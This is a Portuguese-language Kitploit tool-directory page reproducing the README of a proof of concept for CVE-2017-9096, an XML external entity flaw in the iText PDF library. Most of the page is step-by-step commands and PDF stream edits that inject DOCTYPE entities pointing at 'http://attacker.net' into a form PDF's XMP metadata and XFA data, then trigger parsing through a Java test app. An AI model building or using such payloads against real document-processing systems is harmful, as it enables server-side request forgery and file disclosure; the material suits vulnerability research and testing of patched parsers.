Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-9096-iText-XXE | Kitploit
Ferramentas/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebFuzzingTestes de Penetração
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Ver Repositório
133há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-9096

1. Criando o PDF malicioso contendo XXE

Obtenha um PDF contendo um formulário:

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Descomprimir PDF

Para isso, você precisa descomprimir o PDF com qpdf --qdf --object-streams=disable input.pdf output.pdf e então editar o PDF com um editor de texto e adicionar XML malicioso.

Adicionar as entidades externas

Você pode colocar XEE nos metadados XMP na linha 77:

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

E é claro, coloque a referência também em algum lugar, ex. linha 88:

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

Você também pode adicionar um XXE comum ao arquivo. Veja esta parte no documento original (começa na linha 740):

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Altere para o seguinte:

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Então, apenas adicione a referência em algum lugar, ex. no campo Cidade (linha 1845 no documento descomprimido original). Altere isto:

root@kitploit:~
<text
>City:</text
></value
>

Para isto:

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

Você também encontra o PDF corrigido contendo ambos os XXE neste repositório (output_with_xxe.pdf)

2. Realizar o ataque

Execute o aplicativo Java para testar o PDF com mvn clean compile exec:java.

Baixar ferramenta